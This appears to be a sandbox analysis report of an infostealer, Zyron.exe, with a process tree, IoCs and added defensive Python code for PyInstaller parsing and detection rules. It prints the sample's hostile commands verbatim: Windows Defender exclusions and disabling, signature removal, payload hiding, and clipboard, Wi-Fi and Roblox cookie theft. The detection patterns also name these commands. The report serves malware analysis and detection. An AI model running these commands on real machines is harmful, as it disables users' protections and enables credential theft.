Overview

Static analysis tasks (platform windows11-21h2-x64 for every file; first column is the score):

10  Grabbers-D...obf.py
 3  Grabbers-D...ben.py
 3  Grabbers-D...ank.py
 3  Grabbers-D...ean.py
 3  Grabbers-D...una.py
 3  Grabbers-D...obf.py
 3  Grabbers-D...her.py
 3  Grabbers-D...er.jar
 7  Grabbers-D...pycdas
 1  Grabbers-D...as.exe
 1  Grabbers-D.../pycdc
 1  Grabbers-D...dc.exe
 1  Grabbers-D...in/upx
 7  Grabbers-D...px.exe
 7  Grabbers-D...fig.py
 3  Grabbers-D...ile.py
 3  Grabbers-D...ion.py
 3  Grabbers-D...lay.py
 3  Grabbers-D...oad.py
 3  Grabbers-D...t__.py
 3  Grabbers-D...aes.py
 3  Grabbers-D...der.py
 3  Grabbers-D...til.py
 3  Grabbers-D...tor.py
 3  Grabbers-D...rng.py
 3  Grabbers-D...ler.py
 3  Grabbers-D...ons.py
 3  Grabbers-D...ram.py
 3  Grabbers-D...mer.py
 3  Zyron.exe

Analysis (score 10)

max time kernel: 1800s
max time network: 1337s
platform: windows11-21h2_x64
resource: win11-20240419-en
resource tags: arch:x64, arch:x86, image:win11-20240419-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 31-05-2024 17:38
Behavioral tasks (task, sample, resource):

behavioral1   Grabbers-Deobfuscator-main/deobf.py   win11-20240508-en
behavioral2   Grabbers-Deobfuscator-main/methods/ben.py   win11-20240508-en
behavioral3   Grabbers-Deobfuscator-main/methods/blank.py   win11-20240508-en
behavioral4   Grabbers-Deobfuscator-main/methods/empyrean.py   win11-20240426-en
behavioral5   Grabbers-Deobfuscator-main/methods/luna.py   win11-20240508-en
behavioral6   Grabbers-Deobfuscator-main/methods/notobf.py   win11-20240508-en
behavioral7   Grabbers-Deobfuscator-main/methods/other.py   win11-20240419-en
behavioral8   Grabbers-Deobfuscator-main/utils/bin/fernflower.jar   win11-20240426-en
behavioral9   Grabbers-Deobfuscator-main/utils/bin/pycdas   win11-20240426-en
behavioral10  Grabbers-Deobfuscator-main/utils/bin/pycdas.exe   win11-20240426-en
behavioral11  Grabbers-Deobfuscator-main/utils/bin/pycdc   win11-20240508-en
behavioral12  Grabbers-Deobfuscator-main/utils/bin/pycdc.exe   win11-20240508-en
behavioral13  Grabbers-Deobfuscator-main/utils/bin/upx   win11-20240508-en
behavioral14  Grabbers-Deobfuscator-main/utils/bin/upx.exe   win11-20240426-en
behavioral15  Grabbers-Deobfuscator-main/utils/config.py   win11-20240426-en
behavioral16  Grabbers-Deobfuscator-main/utils/decompile.py   win11-20240508-en
behavioral17  Grabbers-Deobfuscator-main/utils/deobfuscation.py   win11-20240426-en
behavioral18  Grabbers-Deobfuscator-main/utils/display.py   win11-20240508-en
behavioral19  Grabbers-Deobfuscator-main/utils/download.py   win11-20240426-en
behavioral20  Grabbers-Deobfuscator-main/utils/pyaes/__init__.py   win11-20240508-en
behavioral21  Grabbers-Deobfuscator-main/utils/pyaes/aes.py   win11-20240426-en
behavioral22  Grabbers-Deobfuscator-main/utils/pyaes/blockfeeder.py   win11-20240508-en
behavioral23  Grabbers-Deobfuscator-main/utils/pyaes/util.py   win11-20240426-en
behavioral24  Grabbers-Deobfuscator-main/utils/pyinstaller/extractors/pyinstxtractor.py   win11-20240426-en
behavioral25  Grabbers-Deobfuscator-main/utils/pyinstaller/extractors/pyinstxtractorng.py   win11-20240508-en
behavioral26  Grabbers-Deobfuscator-main/utils/pyinstaller/pyinstaller.py   win11-20240426-en
behavioral27  Grabbers-Deobfuscator-main/utils/pyinstaller/pyinstallerExceptions.py   win11-20240426-en
behavioral28  Grabbers-Deobfuscator-main/utils/telegram.py   win11-20240508-en
behavioral29  Grabbers-Deobfuscator-main/utils/webhookspammer.py   win11-20240426-en
General

Target: Zyron.exe
Size: 20.1MB
MD5: c93e65b8b3bdf4651aa5f33fbaf6487d
SHA1: fa44cc02066d7e384224ce22ea2c7e37604e6d17
SHA256: a8474496d6a2d25d7e3c34cb41e22417b59ca58f7c94b514492a85bbcb969f30
SHA512: 2ab77d13631d77774bafbc9ad70854fd1c31c3ade62e11ec872b6dd05baa9996c5408ddbe822a714f25ba893bc34839d23cc6cb41394d02bfa38f422c06076cd
SSDEEP: 196608:Jri7DEziLjv+bhqNVoB8Ck5c7GpNlpq41J29bk9qtlDfqWf:YTL+9qz88Ck+7q3p91JBqfqWf
Malware Config
Signatures
Modifies visibility of hidden/system files in Explorer (2 TTPs, 1 IoC)
  svchost.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"
Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  powershell.exe PIDs: 3136, 4872, 4088
Drops file in Drivers directory (3 IoCs)
  attrib.exe: File opened for modification C:\Windows\System32\drivers\etc\hosts
  zyron.exe: File opened for modification C:\Windows\System32\drivers\etc\hosts
  attrib.exe: File opened for modification C:\Windows\System32\drivers\etc\hosts

Executes dropped EXE (8 IoCs)
  2904 zyron.exe; 4868 zyron.exe; 3160 rar.exe; 3972 icsys.icn.exe; 4200 explorer.exe; 676 spoolsv.exe; 4736 svchost.exe; 212 spoolsv.exe

Loads dropped DLL (17 IoCs)
  4868 zyron.exe (all 17 loads)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Resources matching YARA rule upx
  Dropped files under C:\Users\Admin\AppData\Local\Temp\_MEI29042\:
    python312.dll, _ctypes.pyd, libffi-8.dll, _ssl.pyd, _sqlite3.pyd, _socket.pyd, _lzma.pyd, _queue.pyd, _hashlib.pyd, _decimal.pyd, _bz2.pyd, unicodedata.pyd, sqlite3.dll, select.pyd, libssl-3.dll, libcrypto-3.dll
  Memory regions of PID 4868 (behavioral30/memory/4868-<dump>-<range>-memory.dmp), grouped by range with the dump numbers that hit it:
    0x00007FF94CF60000-0x00007FF94D638000  dumps 35, 81, 340, 380
    0x00007FF9638B0000-0x00007FF9638BF000  dumps 58, 382
    0x00007FF95EDB0000-0x00007FF95EDD5000  dumps 57, 85, 341, 381
    0x00007FF95ECA0000-0x00007FF95ECCD000  dumps 64, 383
    0x00007FF95EF60000-0x00007FF95EF79000  dumps 66, 384
    0x00007FF95EA50000-0x00007FF95EA74000  dumps 68, 226, 385
    0x00007FF94CDE0000-0x00007FF94CF56000  dumps 70, 285, 346, 370
    0x00007FF95E010000-0x00007FF95E029000  dumps 72, 293, 371
    0x00007FF961C10000-0x00007FF961C1D000  dumps 74, 372
    0x00007FF94CD10000-0x00007FF94CDDD000  dumps 78, 320, 374
    0x00007FF95DFD0000-0x00007FF95E003000  dumps 77, 305, 373
    0x00007FF94C7E0000-0x00007FF94CD02000  dumps 82, 324, 375
    0x00007FF95DFB0000-0x00007FF95DFC4000  dumps 86, 379
    0x00007FF961A90000-0x00007FF961A9D000  dumps 88, 377
    0x00007FF94C6C0000-0x00007FF94C7DB000  dumps 90, 354, 378
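The dropped files listed above (python312.dll plus a set of .pyd extension modules, unpacked into a _MEI29042 directory under the user's Temp folder) are what a PyInstaller one-file bundle writes at start-up before it runs the embedded Python program. The first thing to establish before handing such a binary to pyinstxtractor and pycdc (both of which the analysed archive carries under utils/) is that it really is a PyInstaller bundle and which Python version it embeds. The following is an added example, not code from the report, from the sample, or from the Grabbers-Deobfuscator project: it searches a file for the PyInstaller CArchive cookie and parses it. The cookie layout is the one PyInstaller 2.1 and later append to the archive; the sample bundle the code parses is constructed inline and contains nothing from the real Zyron.exe.

```python
"""Locate and parse the PyInstaller CArchive cookie in a bundled executable.

Added example (not code from the report, the sample, or Grabbers-Deobfuscator).
Layout of the 88-byte cookie PyInstaller 2.1+ appends after its archive:
    magic[8]      b"MEI\x0c\x0b\x0a\x0b\x0e"
    len           uint32 BE  length of the whole package, cookie included
    toc           uint32 BE  offset of the table of contents from archive start
    toclen        int32  BE  length of the table of contents
    pyvers        int32  BE  312 for Python 3.12 (old bootloaders: 27 for 2.7)
    pylibname[64] NUL-padded name of the Python DLL, e.g. python312.dll
The cookie is usually the last thing in the file, but an Authenticode
signature or other overlay may follow it, so the magic is searched backwards.
"""
import struct

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"                  # big-endian, as the bootloader reads it
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)  # 88


def find_pyinstaller_cookie(data: bytes):
    """Return a dict describing the cookie, or None if this is not a PyInstaller bundle."""
    pos = data.rfind(PYINST_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, pos)
    # PyInstaller >= 4 stores major*100 + minor; older bootloaders used major*10 + minor
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)
    archive_start = pos + COOKIE_SIZE - pkg_len   # same arithmetic pyinstxtractor uses
    if archive_start < 0 or toc_off + toc_len > pkg_len:
        return None                                # magic present but cookie inconsistent
    return {
        "cookie_offset": pos,
        "archive_start": archive_start,
        "toc_offset": archive_start + toc_off,     # absolute file offset of the TOC
        "toc_length": toc_len,
        "python_version": (major, minor),
        "python_lib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def build_sample_bundle(pyvers: int = 312, pylib: bytes = b"python312.dll") -> bytes:
    """Constructed stand-in for a bundled exe: a fake PE header, a 4 KiB archive
    body, a cookie claiming the given Python version/DLL, then a 64-byte trailing
    overlay. Nothing here is taken from the real sample."""
    header = b"MZ" + b"\x90" * 512
    body = b"\x00" * 4096                          # PYZ data and the TOC would live here
    toc_off, toc_len = 4000, 96
    pkg_len = len(body) + COOKIE_SIZE              # the len field counts the cookie too
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, pkg_len, toc_off, toc_len, pyvers, pylib)
    overlay = b"\x00" * 64
    return header + body + cookie + overlay


if __name__ == "__main__":
    print(find_pyinstaller_cookie(build_sample_bundle()))
```

Reading the cookie from a real file is `find_pyinstaller_cookie(open(path, "rb").read())`; a non-None result with `python_version == (3, 12)` tells you which CPython build pycdc needs to decompile the .pyc files that pyinstxtractor will carve from the archive starting at `archive_start`.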
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 4 IoCs)
  svchost.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"
  svchost.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"
  explorer.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"
  explorer.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 1: ip-api.com
Drops file in System32 directory (2 IoCs)
  explorer.exe: File opened for modification C:\Windows\SysWOW64\explorer.exe
  svchost.exe: File opened for modification C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory (6 IoCs)
  explorer.exe: File opened for modification C:\Windows\Resources\Themes\tjcm.cmn
  Zyron.exe: File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe
  icsys.icn.exe: File opened for modification \??\c:\windows\resources\themes\explorer.exe
  explorer.exe: File opened for modification \??\c:\windows\resources\spoolsv.exe
  spoolsv.exe: File opened for modification \??\c:\windows\resources\svchost.exe
  explorer.exe: File opened for modification C:\Windows\Resources\tjud.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Detects videocard installed (1 TTP, 3 IoCs)
Uses WMIC.exe to determine videocard installed.
  WMIC.exe PIDs: 3040, 1352, 1888

Enumerates processes with tasklist (1 TTP, 5 IoCs)
  tasklist.exe PIDs: 2020, 1924, 436, 2432, 4824

Gathers system information (1 TTP, 1 IoC)
Runs systeminfo.exe.

Runs ping.exe (1 TTP, 1 IoC)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  3880 Zyron.exe (32 entries); powershell.exe 3136 (2), 4688 (2), 4872 (2), 2964 (3), 4088 (3), 1212 (2), 360 (2); 3972 icsys.icn.exe (16)

Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
  4200 explorer.exe; 4736 svchost.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs, in report order)
  436 tasklist.exe: SeDebugPrivilege
  3136 powershell.exe: SeDebugPrivilege
  4344 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  4688 powershell.exe: SeDebugPrivilege
  4344 WMIC.exe: the same 21 privileges a second time
  3040 WMIC.exe: the same list, cut off by the 64-IoC cap after privilege 34

Suspicious use of SetWindowsHookEx (10 IoCs)
  3880 Zyron.exe (2); 3972 icsys.icn.exe (2); 4200 explorer.exe (2); 676 spoolsv.exe (2); 4736 svchost.exe (2)

Suspicious use of WriteProcessMemory (64 IoCs; the report records every parent/child pair twice, listed once here)
  3880 Zyron.exe -> 2904 zyron.exe
  2904 zyron.exe -> 4868 zyron.exe
  4868 zyron.exe -> 2068 cmd.exe
  4868 zyron.exe -> 1836 cmd.exe
  4868 zyron.exe -> 1748 cmd.exe
  4868 zyron.exe -> 1800 cmd.exe
  4868 zyron.exe -> 3940 cmd.exe
  1800 cmd.exe -> 436 tasklist.exe
  1836 cmd.exe -> 4688 powershell.exe
  2068 cmd.exe -> 3136 powershell.exe
  1748 cmd.exe -> 1464 mshta.exe
  3940 cmd.exe -> 4344 WMIC.exe
  4868 zyron.exe -> 2648 cmd.exe
  2648 cmd.exe -> 1580 reg.exe
  4868 zyron.exe -> 4412 cmd.exe
  4412 cmd.exe -> 1544 reg.exe
  4868 zyron.exe -> 5084 cmd.exe
  5084 cmd.exe -> 3040 WMIC.exe
  4868 zyron.exe -> 2556 cmd.exe
  2556 cmd.exe -> 1352 WMIC.exe
  4868 zyron.exe -> 1648 cmd.exe
  4868 zyron.exe -> 3736 cmd.exe
  1648 cmd.exe -> 4172 attrib.exe
  3736 cmd.exe -> 4872 powershell.exe
  4868 zyron.exe -> 4600 cmd.exe
  4868 zyron.exe -> 3808 cmd.exe
  3808 cmd.exe -> 4824 tasklist.exe
  4600 cmd.exe -> 2432 tasklist.exe
  4868 zyron.exe -> 4756 cmd.exe
  4868 zyron.exe -> 788 cmd.exe
  4868 zyron.exe -> 3288 cmd.exe
  4868 zyron.exe -> 3016 cmd.exe

Views/modifies file attributes (1 TTP, 3 IoCs)
  attrib.exe PIDs: 900, 4172, 2388
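The signatures above name the behaviours as the sandbox classifies them; the command lines that triggered them are in the process tree that follows. As an added example (not the sandbox's own signature logic, and not code from the sample or from the Grabbers-Deobfuscator project), the following Python tags process-creation events with rules written from those command lines: Defender exclusions and disabled protections, signature removal, hiding the dropped payload with attrib, the hosts-file attribute flips, AV discovery through SecurityCenter2, hardware fingerprinting, and the clipboard, Wi-Fi profile and Roblox cookie collection. The rule names are this example's own. EVENTS is constructed from command lines and PIDs taken from this report; the encoded-PowerShell rule has no sample event because the report elides that command's payload.

```python
"""Tag process-creation command lines with the behaviours seen in this report.

Added example; not the sandbox's signature engine and not code from the sample
or from the Grabbers-Deobfuscator project. Rule names are this example's own.
EVENTS is constructed from command lines and PIDs in this report's process
tree; in practice the input would be Sysmon Event ID 1 or Security 4688 rows.
"""
import re

# (tag, regex applied to the full command line, case-insensitively)
RULES = [
    # Add-MpPreference -Exclusion*: carve the payload out of Defender's scans
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\b", re.I)),
    # Set-MpPreference -Disable... $true: switch off real-time/IOAV/script scanning
    ("defender_protection_disabled",
     re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$true", re.I)),
    # MpCmdRun -RemoveDefinitions: wipe the signature database
    ("defender_definitions_removed",
     re.compile(r"MpCmdRun\.exe.*-RemoveDefinitions", re.I)),
    # attrib +h +s on the dropped binary hides it (paired with ShowSuperHidden=0)
    ("payload_hidden_with_attrib",
     re.compile(r"\battrib\s+\+h\s+\+s\b", re.I)),
    # hosts file made writable, then read-only again, around an edit
    ("hosts_file_attribute_change",
     re.compile(r"\battrib\s+[+-]r\s+.*\\drivers\\etc\\hosts", re.I)),
    # policy bypass plus base64 payload (the report elides the payload itself)
    ("encoded_powershell",
     re.compile(r"powershell(?:\.exe)?\b.*-EncodedCommand", re.I)),
    # which AV is registered, via WMI SecurityCenter2
    ("av_discovery_wmi",
     re.compile(r"SecurityCenter2\b.*AntivirusProduct", re.I)),
    # machine fingerprinting used for victim IDs and VM checks
    ("hardware_fingerprint",
     re.compile(r"\bwmic\s+(?:csproduct\s+get\s+uuid|path\s+win32_VideoController"
                r"|computersystem\s+get\s+totalphysicalmemory|os\s+get\s+caption)", re.I)),
    # data collection: saved Wi-Fi profiles, clipboard, Roblox session cookie
    ("wifi_profile_enumeration", re.compile(r"\bnetsh\s+wlan\s+show\s+profile", re.I)),
    ("clipboard_read", re.compile(r"\bGet-Clipboard\b", re.I)),
    ("roblox_cookie_read", re.compile(r"\.ROBLOSECURITY\b", re.I)),
    # loot staged in a password-protected archive before exfiltration
    ("loot_archived_with_password", re.compile(r"\brar\.exe\s+a\b.*\s-hp", re.I)),
]

DEFENSE_EVASION = {"defender_exclusion_added", "defender_protection_disabled",
                   "defender_definitions_removed", "payload_hidden_with_attrib"}


def tag_command(cmdline: str):
    """Rule tags that fire on one command line, in RULES order."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]


def triage(events):
    """Map PID -> tags for every event that matched at least one rule."""
    report = {}
    for pid, cmdline in events:
        tags = tag_command(cmdline)
        if tags:
            report[pid] = tags
    return report


def verdict(report):
    """Return (all tags seen, sorted PIDs that attacked Defender or hid the payload)."""
    all_tags = {t for tags in report.values() for t in tags}
    evasion = sorted(pid for pid, tags in report.items() if DEFENSE_EVASION & set(tags))
    return all_tags, evasion


# Constructed from this report's process tree: (PID, command line)
EVENTS = [
    (3136, "powershell -Command Add-MpPreference -ExclusionPath 'c:\\users\\admin\\appdata\\local\\temp\\zyron.exe '"),
    (1836, 'C:\\Windows\\system32\\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true '
           '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true '
           '-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled '
           '-SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & '
           '"%ProgramFiles%\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All"'),
    (436, "tasklist /FO LIST"),                      # matches nothing on its own
    (4344, "wmic csproduct get uuid"),
    (4172, 'attrib +h +s "c:\\users\\admin\\appdata\\local\\temp\\zyron.exe "'),
    (2692, "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntivirusProduct Get displayName"),
    (2964, "powershell Get-Clipboard"),
    (2428, "netsh wlan show profile"),
    (2388, "attrib -r C:\\Windows\\System32\\drivers\\etc\\hosts"),
    (1212, "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"),
    (3160, 'C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI29042\\rar.exe a -r -hp"Tookie57!" "C:\\Users\\Admin\\AppData\\Local\\Temp\\3Y54U.zip" *'),
]

if __name__ == "__main__":
    rep = triage(EVENTS)
    for pid, tags in rep.items():
        print(pid, ", ".join(tags))
    print("defense evasion by PIDs:", verdict(rep)[1])
```

The point of keeping `tasklist /FO LIST` in the sample is that it matches nothing: on its own it is routine, and it is the combination with the Defender changes in the same process subtree that makes it worth looking at, which is why `verdict` reports the evasion PIDs separately.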
Processes (indented by depth; each entry gives the image, its command line, and the signatures that fired on it)

[1] PID 3880  C:\Users\Admin\AppData\Local\Temp\Zyron.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Zyron.exe"
    signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  [2] PID 2904  \??\c:\users\admin\appdata\local\temp\zyron.exe
      cmdline: c:\users\admin\appdata\local\temp\zyron.exe
      signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    [3] PID 4868  \??\c:\users\admin\appdata\local\temp\zyron.exe
        cmdline: c:\users\admin\appdata\local\temp\zyron.exe
        signatures: Drops file in Drivers directory; Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
      [4] PID 2068  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 3136  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      [4] PID 1836  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 4688  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      [4] PID 1748  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 1464  C:\Windows\system32\mshta.exe
            cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"
            (the popup text is French: "I will not be responsible for the things you do with this tool", titled "Message from Tookie")
      [4] PID 1800  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 436  C:\Windows\system32\tasklist.exe
            cmdline: tasklist /FO LIST
            signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      [4] PID 3940  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 4344  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic csproduct get uuid
            signatures: Suspicious use of AdjustPrivilegeToken
      [4] PID 2648  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 1580  C:\Windows\system32\reg.exe
            cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      [4] PID 4412  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 1544  C:\Windows\system32\reg.exe
            cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      [4] PID 5084  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 3040  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic path win32_VideoController get name
            signatures: Detects videocard installed; Suspicious use of AdjustPrivilegeToken
      [4] PID 2556  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 1352  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic path win32_VideoController get name
            signatures: Detects videocard installed
      [4] PID 1648  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 4172  C:\Windows\system32\attrib.exe
            cmdline: attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "
            signatures: Views/modifies file attributes
      [4] PID 3736  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 4872  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
      [4] PID 4600  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 2432  C:\Windows\system32\tasklist.exe
            cmdline: tasklist /FO LIST
            signatures: Enumerates processes with tasklist
      [4] PID 3808  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 4824  C:\Windows\system32\tasklist.exe
            cmdline: tasklist /FO LIST
            signatures: Enumerates processes with tasklist
      [4] PID 4756  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        [5] PID 2692  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      [4] PID 788  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        [5] PID 2964  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Get-Clipboard
            signatures: Suspicious behavior: EnumeratesProcesses
      [4] PID 3288  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        [5] PID 2020  C:\Windows\system32\tasklist.exe
            cmdline: tasklist /FO LIST
            signatures: Enumerates processes with tasklist
      [4] PID 3016  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
        [5] PID 3908  C:\Windows\system32\tree.com
            cmdline: tree /A /F
      [4] PID 5064  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        [5] PID 2428  C:\Windows\system32\netsh.exe
            cmdline: netsh wlan show profile
      [4] PID 2032  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "systeminfo"
        [5] PID 2936  C:\Windows\system32\systeminfo.exe
            cmdline: systeminfo
            signatures: Gathers system information
      [4] PID 1600  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        [5] PID 4912  C:\Windows\system32\reg.exe
            cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      [4] PID 3464  C:\Windows\system32\cmd.exe
